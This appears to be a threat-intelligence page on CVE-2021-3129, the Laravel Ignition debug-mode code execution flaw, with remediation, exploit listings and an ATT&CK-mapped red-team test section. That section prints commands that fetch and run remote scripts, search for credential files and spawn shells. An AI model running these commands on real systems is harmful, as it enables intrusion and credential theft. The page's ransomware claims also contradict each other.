CVE-2021-3129

CRITICAL CISA KEV EXPLOIT POC TTE 10h Pub 12/01 Upd 21/10

Overview

This vulnerability is a remote code execution flaw caused by insecure handling of file operations within the Ignition error handling package used by Laravel. Specifically, the use of file_get_contents() and file_put_contents() functions without proper input validation allows untrusted input to be processed. The flaw manifests in the debug mode feature of Laravel applications prior to version 8.4.2 when interacting with Ignition versions before 2.5.2, exposing the file handling component to exploitation.

Vulnerability Description

Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.

Impact

An attacker can execute arbitrary code remotely without authentication or user interaction by exploiting this vulnerability. This enables full system compromise, including unauthorized access, data theft, and potential lateral movement within the affected environment. The exploitation requires only that the Laravel application runs in debug mode with vulnerable Ignition and Laravel versions, a common configuration in development or staging environments but sometimes present in production.

Solution

Upgrade Ignition to version 2.5.2 or later and Laravel to version 8.4.2 or later to address this vulnerability. The Ignition GitHub repository pull request #334 contains the relevant fix, and detailed patch instructions are available in Laravel's official release notes. Disabling debug mode in production environments is recommended as a temporary mitigation. Refer to https://github.com/facade/ignition/pull/334 and https://github.com/laravel/framework/releases/tag/v8.4.2 for specific remediation steps.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in question arises from the insecure handling of file operations within the Ignition debugging tool, which is commonly utilized in Laravel applications. Specifically, the issue stems from the improper usage of functions such as file_get_contents() and file_put_contents(). When debug mode is enabled, these functions can be exploited by unauthenticated remote attackers to execute arbitrary code on the server. This is particularly concerning for applications that do not enforce strict access controls, as it allows attackers to manipulate files on the server, potentially leading to a complete compromise of the application and its underlying infrastructure.

Attack vectors for this vulnerability are primarily centered around web applications that have debug mode enabled. An attacker can craft a malicious request that leverages the vulnerable functions to read sensitive files or write malicious scripts to the server. For instance, if an attacker can control the input to file_get_contents(), they could read configuration files containing sensitive information such as database credentials. Furthermore, by exploiting file_put_contents(), an attacker could upload a backdoor or other malicious payload, allowing them to execute arbitrary code at will. This exploitation can occur without any prior authentication, making it particularly dangerous for applications that do not implement robust security measures.

The real-world impact of this vulnerability can be significant, especially for businesses that rely on Laravel for their web applications. The potential for unauthorized code execution can lead to data breaches, loss of customer trust, and significant financial repercussions. Organizations may face legal liabilities if sensitive data is compromised, and the costs associated with incident response, remediation, and public relations efforts can be substantial. Additionally, the reputation of the affected organization can suffer long-term damage, as customers may be hesitant to engage with a business that has experienced a security breach.

To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, it is crucial to ensure that debug mode is disabled in production environments. Regularly reviewing and updating dependencies, including the Ignition tool and Laravel framework, is essential to protect against known vulnerabilities. Implementing strict input validation and sanitization can help prevent attackers from injecting malicious payloads into file operations. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of security by monitoring and filtering incoming traffic for suspicious activity.

In conclusion, the vulnerability associated with the Ignition debugging tool poses a serious threat to Laravel applications, particularly when debug mode is enabled. The ability for unauthenticated attackers to execute arbitrary code can lead to severe consequences for organizations, including data breaches and reputational damage. By implementing effective detection and mitigation strategies, businesses can significantly reduce their risk exposure and protect their applications from exploitation. Continuous monitoring and updating of security practices are essential in maintaining a robust security posture against evolving threats.




CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-3129, indicating persistent adversary interest despite the vulnerability’s age. Our telemetry shows that attackers continue to leverage publicly available proof-of-concept exploits, maintaining steady activity levels without a rapid surge. The presence of this vulnerability in ransomware campaigns underscores its ongoing operational relevance, particularly against Laravel applications with debug mode enabled. While the overall threat landscape remains stable, this sustained exploitation activity reinforces the criticality of timely patching and vigilant monitoring. Defenders should remain aware that adversaries are actively exploiting this flaw in the wild, which sustains its high-risk profile within the current threat environment.



Update 2 — July 03, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-3129, reflecting increased adversary interest in leveraging this critical Laravel Ignition vulnerability. Our telemetry indicates a consistent upward trend in attack activity, underscoring that threat actors continue to prioritize this vector, particularly within environments where debug mode remains enabled. The persistence of publicly available, user-friendly proof-of-concept exploits facilitates broader attacker adoption, while ongoing use in ransomware campaigns highlights the vulnerability’s operational utility for initial access and lateral movement. Although the EPSS score remains near maximum and stable, the observed surge in exploitation attempts elevates the immediate risk posture. Defenders should interpret this as a signal that exploitation is intensifying, reinforcing the vulnerability’s status as a high-priority threat requiring sustained vigilance.



Update 3 — July 22, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of new proof-of-concept tools that streamline attack execution. This development signals an ongoing refinement and wider dissemination of exploitation capabilities within the attacker community. The availability of more user-friendly exploit variants lowers the barrier to entry for less sophisticated threat actors, potentially broadening the pool of adversaries leveraging this vulnerability. Additionally, the persistence of ransomware groups employing this exploit underscores its continued operational relevance for initial access and lateral movement. While the overall exploit probability score remains near its peak, the incremental uptick in activity and expanded exploit toolkit collectively elevate the threat environment. Defenders should recognize this as an indication that adversaries are actively enhancing their exploitation methods, thereby sustaining the vulnerability’s critical risk profile.



Update 4 — August 05, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of additional publicly available proof-of-concept exploits that enhance attacker accessibility and automation. This surge reflects increased adversary interest and operational activity, particularly among ransomware-affiliated groups that continue to leverage this vulnerability for initial access and lateral movement within compromised environments. Although the EPSS score remains near its historical peak, the qualitative increase in telemetry signals a sustained and possibly expanding threat actor engagement. For defenders, this heightened activity underscores the necessity of maintaining vigilant monitoring and reinforces the criticality of timely patching and configuration management to mitigate exploitation risks. The evolving exploit landscape, characterized by more user-friendly and automated tools, further elevates the threat level by lowering the technical barrier for exploitation, thereby broadening the pool of potential attackers.



Update 5 — August 20, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of several new proof-of-concept tools that simplify attack execution. This development indicates that threat actors are increasingly leveraging automated and publicly available resources to exploit Laravel Ignition instances operating in debug mode. Notably, ransomware groups have been observed incorporating this vulnerability into their attack chains, heightening the risk of impactful compromise. Although the EPSS score remains stable near its peak, the qualitative surge in telemetry and expanded exploit toolkit signify an elevated threat environment. For defenders, this evolution underscores a growing likelihood of opportunistic exploitation, particularly in environments where patching and debug mode configurations remain unaddressed. Consequently, the threat level associated with CVE-2021-3129 should be considered heightened due to increased adversary engagement and lowered exploitation barriers.

Affected Products (1)

Vendor Product Version CPE
facade Facade Ignition All cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Unauthenticated remote code execution in Ignition
exploits/multi/php/ignition_laravel_debug_rce
- Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
Laravel 8.4.2 debug mode - Remote code execution SunCSR Team webapps php - View

GitHub PoCs (35)

Repository Author Stars Forks Date Link
ambionics/laravel-exploits
Exploit for CVE-2021-3129
ambionics 289 69 2021-01-13 View
zhzyker/CVE-2021-3129
Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
zhzyker 163 55 2021-02-18 View
SNCKER/CVE-2021-3129
Laravel debug rce
SNCKER 135 50 2021-01-22 View
joshuavanderpoll/CVE-2021-3129
Laravel RCE Exploit PoC - CVE-2021-3129 (user-friendly with automatic log path detection)
joshuavanderpoll 153 26 2022-04-16 View
SecPros-Team/laravel-CVE-2021-3129-EXP
SecPros-Team 78 30 2021-01-25 View
nth347/CVE-2021-3129_exploit
Exploit for CVE-2021-3129
nth347 69 27 2021-01-27 View
crisprss/Laravel_CVE-2021-3129_EXP
crisprss 18 7 2021-01-27 View
knqyf263/CVE-2021-3129
PoC for CVE-2021-3129 (Laravel)
knqyf263 12 3 2021-10-01 View
ajisai-babu/CVE-2021-3129-exp
Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp
ajisai-babu 13 1 2023-03-04 View
0x0d3ad/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
0x0d3ad 10 1 2024-09-29 View
Y0s9/CVE-2021-3129
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞
Y0s9 0 9 2021-04-11 View
cuongtop4598/CVE-2021-3129-Script
Add revert shell
cuongtop4598 7 1 2022-04-08 View
FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129
FunPhishing 2 6 2021-02-14 View
MadExploits/Laravel-debug-Checker
CVE-2021-3129 Exploit Checker By ./MrMad
MadExploits 7 1 2022-12-10 View
0nion1/CVE-2021-3129
CVE-2021-3129-Laravel Debug mode
0nion1 6 1 2022-10-11 View
Axianke/CVE-2021-3129
CVE-2021-3129
Axianke 5 0 2024-01-15 View
shadowabi/Laravel-CVE-2021-3129
CVE-2021-3129 POC
shadowabi 5 0 2022-06-04 View
wmasday/CVE-2021-3129
CVE-2021-3129 | Laravel Debug Mode Vulnerability
wmasday 2 1 2023-07-27 View
idea-oss/laravel-CVE-2021-3129-EXP
idea-oss 1 2 2021-07-22 View
lukwagoasuman/CVE-2021-3129---Laravel-RCE
## About The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.<br> This script allows y...
lukwagoasuman 1 1 2025-01-30 View
keyuan15/CVE-2021-3129
Laravel RCE CVE-2021-3129
keyuan15 1 0 2023-03-11 View
Prabesh01/hoh4
Modified version of laravel ignition RCE (CVE-2021-3129) exploit script for Hour of Hack Session-4
Prabesh01 0 1 2024-12-04 View
miko550/CVE-2021-3129
Laravel RCE (CVE-2021-3129)
miko550 0 1 2023-07-26 View
Giangdurian/CVE-2021-3129
Giangdurian 0 0 2026-08-07 View
theNareshofficial/CVE-2021-3129-Lab
CVE-2021-3129: Laravel Debug Mode RCE - Complete exploitation lab with Python exploit, Docker container, and security a...
theNareshofficial 0 0 2026-07-18 View
M4rrow/CVE-2021-3129-EXP
Laravel RCE Exploit PoC - CVE-2021-3129 (user-friendly with automatic log path detection)
M4rrow 0 0 2026-05-12 View
M4rrow/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
M4rrow 0 0 2026-04-14 View
Nullsecur1ty/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
Nullsecur1ty 0 0 2026-02-20 View
GodOfServer/CVE-2021-3129
GodOfServer 0 0 2024-10-31 View
Zoo1sondv/CVE-2021-3129
Zoo1sondv 0 0 2023-05-01 View
piperpwn/CVE-2021-3129-piperpwn
Laravel Debug Mode and Payload
piperpwn 0 0 2024-07-16 View
banyaksepuh/Mass-CVE-2021-3129-Scanner
banyaksepuh 0 0 2023-10-22 View
cc3305/CVE-2021-3129
A exploit script for CVE-2021-3129
cc3305 0 0 2024-05-19 View
hupe1980/CVE-2021-3129
Laravel debug mode - Remote Code Execution (RCE)
hupe1980 0 0 2022-09-30 View
qaisarafridi/cve-2021-3129
qaisarafridi 0 0 2023-04-06 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

33 events
2026-08-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2023-09-18
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2021-01-13
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

2021-01-13
PoC Published (35 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
91% rce
Code Injection
75% code_injection
OS Command Injection
56% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2021-3129
ambionics.io
GitHub CVE x_refsource_MISC
https://www.ambionics.io/blog/laravel-debug-rce
github.com
GitHub CVE x_refsource_MISC
https://github.com/facade/ignition/pull/334
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/162094/Ignition-2.5.1-Remote-Code-Execution.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/165999/Ignition-Remote-Code-Execution.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-3129